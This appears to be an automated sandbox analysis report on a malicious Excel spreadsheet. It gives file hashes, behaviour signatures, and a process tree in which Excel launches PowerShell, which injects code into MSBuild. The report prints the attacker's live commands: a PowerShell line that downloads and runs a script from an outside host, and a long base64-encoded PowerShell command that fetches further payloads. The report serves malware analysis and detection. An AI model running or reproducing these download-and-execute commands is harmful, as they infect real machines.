693d9d37ad3db2ed356a910887cd6755f0402eba0d8421eb075a29e0e42368f6

General

Target

______ _______.xls
Size

407KB
MD5

10fcf8f9a5cbf00587934bf6c817846b
SHA1

27dff4578ff00eb45249972feb79b3f4784463d0
SHA256

693d9d37ad3db2ed356a910887cd6755f0402eba0d8421eb075a29e0e42368f6
SHA512

394ac1146a432334e95ee1ca027f95d39cc44d2bcf6c5a5a82fc1092db5e84d8b9d4e8e85830480e6a6dc36783b3ae0e1464df61c4ed08b984a210f9968c22e4

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://lujo.world/parse.jpg

Signatures

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powersheLL.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1840 powersheLL.exe
Token: SeDebugPrivilege 1964 powershell.exe

description	pid	process
Token: SeDebugPrivilege	1840	powersheLL.exe
Token: SeDebugPrivilege	1964	powershell.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powersheLL.exepowershell.exe

pid	process
1840	powersheLL.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe
1964	powershell.exe

Blacklisted process makes network request 3 IoCs

Processes:

powersheLL.exepowershell.exe

flow pid process

5 1840 powersheLL.exe
8 1964 powershell.exe
9 1964 powershell.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1668 EXCEL.EXE
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

EXCEL.EXE

pid process

1668 EXCEL.EXE
1668 EXCEL.EXE
1668 EXCEL.EXE

flow	pid	process
5	1840	powersheLL.exe
8	1964	powershell.exe
9	1964	powershell.exe

pid	process
1668	EXCEL.EXE

pid	process
1668	EXCEL.EXE
1668	EXCEL.EXE
1668	EXCEL.EXE

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1840	1668	powersheLL.exe	EXCEL.EXE

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

EXCEL.EXEpowersheLL.exepowershell.exe

description	pid	process	target process
PID 1668 wrote to memory of 1840	1668	EXCEL.EXE	powersheLL.exe
PID 1668 wrote to memory of 1840	1668	EXCEL.EXE	powersheLL.exe
PID 1668 wrote to memory of 1840	1668	EXCEL.EXE	powersheLL.exe
PID 1840 wrote to memory of 1964	1840	powersheLL.exe	powershell.exe
PID 1840 wrote to memory of 1964	1840	powersheLL.exe	powershell.exe
PID 1840 wrote to memory of 1964	1840	powersheLL.exe	powershell.exe
PID 1964 wrote to memory of 2036	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 2036	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 2036	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 2036	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1120	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1120	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1120	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1120	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1116	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1116	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1116	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1116	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1832	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1832	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1832	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1832	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1816	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1816	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1816	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1816	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1824	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1824	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1824	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1824	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 828	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1736	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1736	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1736	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1736	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1172	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1172	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1172	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1172	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1624	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1624	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1624	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1624	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1572	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1572	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1572	1964	powershell.exe	MSBuild.exe
PID 1964 wrote to memory of 1572	1964	powershell.exe	MSBuild.exe

C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\______ _______.xls"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://lujo.world/parse.jpg')
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAB2AGMAbgB5AEQAcgBOAEoAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAYABvAGEAHSAsACcAZwAnACkAOwBbAHYAbwBpAGQAXQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAnAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjACcAKQA7ACQAbgBMAFcATQBrAGQARABXAE0AQQBVAHgAVwBZAHgASgBVAG0ATQBSAGMAawBqAFYARwBwAGUAWgBOAEsAeABWAGoAdwBaAFIAdgB5AHgAcABZAG4AWgBnAGMAZgBnAGUAQgBUAHEAYwBVAHAAQQBqAG4AVABrAHcAaABCAFIAZwBiAEwAbwBRAEsAUwBkAFEAeQBEAE4AQgBzAE4AVwBuAFgAcQBqAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJAB2AGMAbgB5AEQAcgBOAEoALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AQwA0AEYAUAA2AC8AMAAnACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAG4ATABXAE0AawBkAEQAVwBNAEEAVQB4AFcAWQB4AEoAVQBtAE0AUgBjAGsAagBWAEcAcABlAFoATgBLAHgAVgBqAHcAWgBSAHYAeQB4AHAAWQBuAFoAZwBjAGYAZwBlAEIAVABxAGMAVQBwAEEAagBuAFQAawB3AGgAQgBSAGcAYgBMAG8AUQBLAFMAZABRAHkARABOAEIAcwBOAFcAbgBYAHEAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHYAYwBuAHkARAByAE4ASgAsAFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBDAGEAbABsAFQAeQBwAGUAXQA6ADoATQBlAHQAaABvAGQALAAnAGgAdAB0ACcAKwBbAEMAaABhAHIAXQA4ADAAKwAnAHMAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAEcAVwBZADkAeAAnACkALgByAGUAcABsAGEAYwBlACgAJwBAACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAG4ATABXAE0AawBkAEQAVwBNAEEAVQB4AFcAWQB4AEoAVQBtAE0AUgBjAGsAagBWAEcAcABlAFoATgBLAHgAVgBqAHcAWgBSAHYAeQB4AHAAWQBuAFoAZwBjAGYAZwBlAEIAVABxAGMAVQBwAEEAagBuAFQAawB3AGgAQgBSAGcAYgBMAG8AUQBLAFMAZABRAHkARABOAEIAcwBOAFcAbgBYAHEAKQA=
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1964

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:2036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1832

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1824

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1736

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
4⤵
PID:1572

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Download Submit
memory/1840-0-0x0000000000000000-mapping.dmp

Download
memory/1964-1-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads